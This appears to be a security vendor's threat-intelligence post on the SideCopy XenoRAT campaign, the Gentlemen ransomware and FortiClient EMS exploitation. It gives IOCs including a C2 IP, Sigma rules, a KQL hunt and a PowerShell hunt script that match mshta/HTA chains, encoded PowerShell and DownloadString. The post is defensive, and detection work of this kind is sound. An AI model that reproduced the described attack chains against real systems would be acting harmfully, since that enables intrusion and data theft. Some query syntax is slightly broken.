Back to Intelligence

Operation XENOFISCAL & Storm-2697: XenoRAT, The Gentlemen RaaS, and FortiClient EMS Exploitation — OTX Pulse Intelligence

SA
Security Arsenal Team
May 29, 2026
11 min read

Recent OTX pulse data indicates a convergence of sophisticated nation-state activity and aggressive cybercrime operations. The SideCopy APT (Transparent Tribe) is actively targeting the Afghan Ministry of Finance using a persistent XenoRAT campaign dubbed "Operation XENOFISCAL." Simultaneously, the cybercrime ecosystem is expanding with the emergence of "The Gentlemen," a new RaaS operation (Storm-2697) utilizing self-propagating Go-based encryptors, and the active exploitation of FortiClient EMS servers (CVE-2026-35616) to deploy EKZ Infostealer. These threats collectively demonstrate high technical sophistication, leveraging trusted infrastructure, self-propagation, and supply chain weaknesses.

Threat Summary

The current threat landscape is dominated by three distinct but equally dangerous campaigns:

  1. APT Espionage (SideCopy/XenoRAT): A Pakistan-linked threat group is conducting a geo-politically motivated spear-phishing campaign against Afghan financial institutions. The objective is intelligence gathering and persistent access to government networks. The attack chain exploits social engineering (Pashto-language lures) and compromised legitimate infrastructure (.edu domains) to deliver multi-stage loaders.

  2. Cybercrime-as-a-Service (The Gentlemen): A new RaaS operation has emerged, offering affiliates a robust Go-based ransomware strain. Its key differentiators are aggressive self-propagation capabilities and strong cryptography (Curve25519 + XChaCha20), aiming for rapid, widespread network compromise across critical sectors like healthcare and education.

  3. Infrastructure Abuse (EKZ Infostealer): A critical vulnerability in FortiClient EMS (CVE-2026-35616) is being exploited in the wild. Attackers are bypassing authentication on endpoint management servers to push malicious payloads masquerading as security patches. This represents a "living-off-the-land" attack where trusted security tools are weaponized for lateral movement and malware delivery.

Threat Actor / Malware Profile

SideCopy APT & XenoRAT

  • Distribution Method: Spear-phishing emails containing malicious LNK files disguised as staff directories. The LNK file executes mshta.exe to fetch a remote HTA payload from a compromised Afghan education domain (abimj.edu.af).
  • Payload Behavior: The HTA file acts as a multi-stage loader, ultimately deploying the XenoRAT payload. XenoRAT is a full-featured Remote Access Trojan.
  • C2 Communication: Connects to command and control (C2) infrastructure (e.g., 103.132.98.224) to receive commands and exfiltrate data.
  • Persistence Mechanism: Utilizes standard persistence techniques common to APT tooling, often involving registry run keys or scheduled tasks established by the initial HTA loader.
  • Anti-Analysis Techniques: Employs a multi-stage execution chain (LNK -> mshta -> HTA -> DLL/RAT) to bypass simple static analysis and sandbox detonation.

Storm-2697 & The Gentlemen RaaS

  • Distribution Method: Likely via initial access brokers or direct exploitation of vulnerable internet-facing services, given its self-propagating nature.
  • Payload Behavior: A ransomware encryptor written in Go, capable of encrypting files using a hybrid encryption scheme (Curve25519 for key exchange and XChaCha20 for file encryption).
  • Self-Propagation: The malware actively spreads laterally across the network, a key feature that distinguishes it from more traditional, single-system encryptors.
  • Persistence Mechanism: Likely uses WMI or scheduled tasks for persistence across the compromised network.
  • Anti-Analysis Techniques: Written in Go, which can make reverse engineering more challenging for analysts accustomed to C/C++ malware.

EKZ Infostealer & CVE-2026-35616

  • Distribution Method: Exploitation of CVE-2026-35616, an improper access control flaw in FortiClient EMS. Attackers bypass API authentication and execute privileged requests to push a malicious script.
  • Payload Behavior: A PowerShell script disguised as a Fortinet patch, which downloads and executes the EKZ Infostealer. EKZ is designed to steal sensitive data from the infected endpoint.
  • C2 Communication: Connects to attacker-controlled servers to exfiltrate stolen credentials and data.
  • Persistence Mechanism: The malicious PowerShell script may establish persistence by creating scheduled tasks or modifying registry keys.
  • Anti-Analysis Techniques: Uses PowerShell for execution, which can obfuscate its activity and blend in with legitimate administrative tasks.

IOC Analysis

The provided pulses offer a mix of network and file-based IOCs that are crucial for detection and containment.

  • Network Indicators:

    • IPv4: 103.132.98.224 (SideCopy XenoRAT C2). This IP should be immediately blocked at perimeter firewalls and monitored for outbound connections.
    • Domain: abimj.edu.af. This compromised educational domain is used as a payload delivery server. Blocking this domain prevents the malware from downloading its next stage.

  • File Hashes (SHA256, MD5, SHA1): Numerous hashes are provided for the malicious LNK, HTA, and DLL files from the XenoRAT campaign, and for the Gentlemen ransomware and EKZ Infostealer binaries. These can be used in EDR solutions to quarantine or alert on the presence of these files.

  • CVEs:

    • CVE-2026-35616: Critical vulnerability in FortiClient EMS. This is a prime indicator for vulnerability scanning and patching prioritization.
    • CVE-2026-0300: Another vulnerability mentioned in the EKZ Infostealer pulse, suggesting a potential chain of exploitation or related campaign infrastructure.

Operational Guidance for SOC Teams:

  1. Immediate Blocking: Add all IP and domain IOCs to your security information and event management (SIEM) and firewall blocklists. Automate this push if possible.
  2. EDR Integration: Import all file hashes into your Endpoint Detection and Response (EDR) platform as "malicious" to trigger alerts for any execution or file creation events matching these hashes.
  3. Vulnerability Management: Prioritize patching for CVE-2026-35616 on all FortiClient EMS servers. Conduct a scan to identify any unpatched instances.
  4. Network Traffic Analysis: Use your network detection and response (NDR) tools to hunt for non-HTTP traffic to the known C2 IP or any anomalous data exfiltration patterns from internal workstations.

Detection Engineering

title: SideCopy XenoRAT Malicious LNK and Mshta Execution Pattern id: 9f04f4b4-2d9a-4951-b823-9e7e508f10e8 description: Detects the execution pattern associated with the SideCopy XenoRAT campaign, where a malicious LNK file spawns mshta.exe to fetch a remote HTA payload. This is a key TTP in the Operation XENOFISCAL attack chain. status: experimental author: Security Arsenal references: - https://otx.alienvault.com/pulse/65643f90e97f8f15c7d2f0d8/ - https://attack.mitre.org/techniques/T1059/005/ date: 2026/05/29 modified: 2026/05/29 tags: - attack.execution - attack.t1059.005 - attack.initial_access - attack.t1566.001 - detection.emerging-threats logsource: category: process_creation product: windows detection: selection_parent: ParentImage|endswith: - '\explorer.exe' - '\winword.exe' - '\excel.exe' Image|endswith: - '\cmd.exe' - '\powershell.exe' selection_child: Image|endswith: '\mshta.exe' CommandLine|contains: '.hta' condition: selection_parent and selection_child falsepositives: - Potential false positive if a legitimate application uses mshta to load a local HTA file. level: high

title: FortiClient EMS Exploitation via CVE-2026-35616 API Abuse id: 88eefc90-3db1-49c8-bc08-75c3dc2db28e description: Detects potential exploitation of CVE-2026-35616 on FortiClient EMS. This rule identifies successful API authentication bypass attempts by monitoring for successful API calls from anomalous user agents or source IPs that do not match the typical Fortinet management console patterns. This is an indication that an attacker may be pushing malicious payloads. status: experimental author: Security Arsenal references: - https://otx.alienvault.com/pulse/65643f90e97f8f15c7d2f0d9/ - https://attack.mitre.org/techniques/T1190/ date: 2026/05/29 modified: 2026/05/29 tags: - attack.initial_access - attack.t1190 - attack.execution - attack.t1059.001 - cve.2026.35616 logsource: product: fortinet service: forticlient-ems detection: selection_api: EventID: '4101' # Or the specific Event ID for API calls in your FortiClient EMS logs RequestMethod: 'POST' RequestURI|contains: '/api/' selection_bypass: StatusCode: '200' # Successful API call |OR| Authenticated: 'false' # A key indicator of CVE-2026-35616 filter_fortinet_console: SourceIP: # Add your known, trusted FortiClient EMS management console IPs here - '10.0.0.0/8' - '192.168.0.0/16' condition: selection_api and selection_bypass and not filter_fortinet_console falsepositives: - Legitimate, but misconfigured, API calls from an unregistered source. level: critical

title: The Gentlemen RaaS Go-Based Ransomware Activity id: 45f8e8a1-6d7c-4a2e-b883-56b194d6c58c description: Detects activity indicative of The Gentlemen ransomware, a Go-based encryptor. This rule identifies a process with a high number of file modifications in a short timeframe, a behavior consistent with aggressive self-propagating ransomware. It also checks for the presence of a common Go executable compile path. status: experimental author: Security Arsenal references: - https://otx.alienvault.com/pulse/65643f90e97f8f15c7d2f0d9/ - https://attack.mitre.org/techniques/T1486/ date: 2026/05/29 modified: 2026/05/29 tags: - attack.impact - attack.t1486 - malware.the_gentlemen logsource: category: file_event product: windows detection: selection_go_path: Image|contains: '\go-build' selection_mass_encryption: TargetFilename|contains: - '.docx' - '.xlsx' - '.pdf' - '.jpg' - '.png' EventID: 11 # File created timeframe: 1m condition: selection_go_path and selection_mass_encryption | count() > 20 falsepositives: - Legitimate bulk file processing by a known application (e.g., a data migration tool). Tuning of the count threshold is required. level: high

KQL — Microsoft Sentinel / Defender
// Hunt for SideCopy XenoRAT C2 Communication and Process Chain
// Look for processes spawning mshta.exe with .hta arguments
let XenoRATHunt =
    DeviceProcessEvents
    | where Timestamp > ago(7d)
    | where (InitiatingProcessFileName in~ ("explorer.exe", "winword.exe", "excel.exe", "cmd.exe", "powershell.exe"))
    | where FileName == "mshta.exe"
    | where ProcessCommandLine has ".hta"
    | project DeviceId, Timestamp, InitiatingProcessFileName, FileName, ProcessCommandLine, AccountName;
// Look for network connections to the known C2 IP
let C2CommunicationHunt =
    DeviceNetworkEvents
    | where Timestamp > ago(7d)
    | where RemoteIP == "103.132.98.224"
    | project DeviceId, Timestamp, RemoteIP, RemotePort, InitiatingProcessFileName, AccountName;
// Hunt for EKZ Infostealer delivery via PowerShell from FortiClient EMS server
let EKZDeliveryHunt =
    DeviceProcessEvents
    | where Timestamp > ago(7d)
    | where FileName == "powershell.exe"
    | where ProcessCommandLine has "patch" and ProcessCommandLine has "-enc" or ProcessCommandLine has "DownloadString"
    | where InitiProcessFileName == "FortiClientEMS.exe" or InitiProcessFileName == "FortiESNAC.exe"
    | project DeviceId, Timestamp, FileName, ProcessCommandLine, AccountName;
// Union all hunts for a comprehensive view
union XenoRATHunt, C2CommunicationHunt, EKZDeliveryHunt


powershell
# IOC Hunt Script for XenoRAT, EKZ Infostealer, and The Gentlemen Ransomware
# This script checks for specific registry keys, file paths, and network connections.
# Run with elevated privileges.

# 1. Check for SideCopy XenoRAT persistence (Registry Run Keys)
Write-Host "Checking for XenoRAT Persistence in Registry Run Keys..." -ForegroundColor Yellow
$RunPaths = @("HKLM:\Software\Microsoft\Windows\CurrentVersion\Run", 
              "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run")
$RunKeys = Get-ItemProperty -Path $RunPaths -ErrorAction SilentlyContinue
foreach ($Key in $RunKeys.PSObject.Properties) {
    if ($Key.Name -notin @("PSPath","PSParentPath","PSChildName","PSDrive","PSProvider")) {
        $Value = $Key.Value
        # Check for suspicious mshta or script-based persistence
        if ($Value -match "mshta" -or $Value -match ".hta" -or $Value -match "powershell.*-enc") {
            Write-Host "[!] Suspicious Run Key found: $($Key.Name) = $Value" -ForegroundColor Red
        }
    }
}

# 2. Check for EKZ Infostealer Suspicious PowerShell Scripts
Write-Host "Checking for EKZ Infostealer-related PowerShell Scripts..." -ForegroundColor Yellow
$TempPath = $env:TEMP
$PSFiles = Get-ChildItem -Path $TempPath -Filter "*.ps1" -ErrorAction SilentlyContinue
foreach ($File in $PSFiles) {
    $Content = Get-Content $File.FullName -Raw -ErrorAction SilentlyContinue
    if ($Content -match "DownloadString" -and $Content -match "patch") {
        Write-Host "[!] Suspicious PowerShell file found: $($File.FullName)" -ForegroundColor Red
    }
}

# 3. Check for network connections to known C2 IPs
Write-Host "Checking for active connections to known C2 IPs..." -ForegroundColor Yellow
$C2IPs = @("103.132.98.224")
$Connections = Get-NetTCPConnection -State Established, Listen -ErrorAction SilentlyContinue
foreach ($IP in $C2IPs) {
    $MatchingConns = $Connections | Where-Object { $_.RemoteAddress -eq $IP }
    if ($MatchingConns) {
        foreach ($Conn in $MatchingConns) {
            $Process = Get-Process -Id $Conn.OwningProcess -ErrorAction SilentlyContinue
            Write-Host "[!] Found connection to C2 IP $IP from PID $($Conn.OwningProcess) ($($Process.ProcessName))" -ForegroundColor Red
        }
    }
}

# 4. Check for The Gentlemen Ransomware file indicators (example path)
Write-Host "Checking for common ransomware note/drop path..." -ForegroundColor Yellow
$RansomPaths = @("C:\Users\Public\Documents", "C:\Users\Public\Desktop")
$RansomFiles = Get-ChildItem -Path $RansomPaths -Filter "*.txt" -ErrorAction SilentlyContinue
foreach ($File in $RansomFiles) {
    if ($File.Name -match "readme" -or $File.Name -match "recover") {
        Write-Host "[!] Found potential ransom note: $($File.FullName)" -ForegroundColor Yellow
    }
}

Write-Host "Hunt complete. Review all [!] findings." -ForegroundColor Green


# Response Priorities

*   **Immediate (0-4h):**
    *   **Block IOCs:** Immediately block all IP addresses and domains listed in the IOC Analysis section at your network perimeter and proxies.
    *   **Isolate Compromised Systems:** If a system is detected connecting to the SideCopy C2 IP (`103.132.98.224`) or shows evidence of EKZ Infostealer execution, isolate it from the network.
    *   **Patch FortiClient EMS:** Initiate an emergency patching cycle for CVE-2026-35616 on all FortiClient EMS servers. If patching is not immediately possible, restrict API access to known, trusted subnets.

*   **24h:**
    *   **Credential Reset:** If EKZ Infostealer is suspected or confirmed, prioritize resetting credentials for accounts that were logged into the infected endpoints, particularly those with privileged access.
    *   **Full Endpoint Scan:** Conduct a full, in-depth scan on all endpoints using the provided file hashes to detect any dormant malware.
    *   **Hunt for Persistence:** Use the PowerShell script or equivalent to broadly hunt for the persistence mechanisms described in the malware profiles across your fleet.

*   **1 Week:**
    *   **Architecture Hardening:** Implement microsegmentation to limit lateral movement capabilities, which would mitigate the self-propagation feature of The Gentlemen ransomware.
    *   **Enhance Email Filtering:** Update email security gateways to block or heavily sandbox LNK files and HTA attachments to prevent future SideCopy-style spear-phishing.
    *   **Endpoint Management Review:** Audit and harden the security posture of all endpoint management tools (like FortiClient EMS) to reduce the attack surface for similar API-based exploits.

Related Resources

Security Arsenal Incident Response Managed SOC & MDR Services AlertMonitor Threat Detection From The Dark Side Intel Hub

darkwebotx-pulsedarkweb-malwarexenoratthe-gentlemen-ransomwareekz-infostealersidecopyforticlient-ems-exploit

Is your security operations ready?

Get a free SOC assessment or see how AlertMonitor cuts through alert noise with automated triage.

Book a SOC AssessmentSee AlertMonitor in Action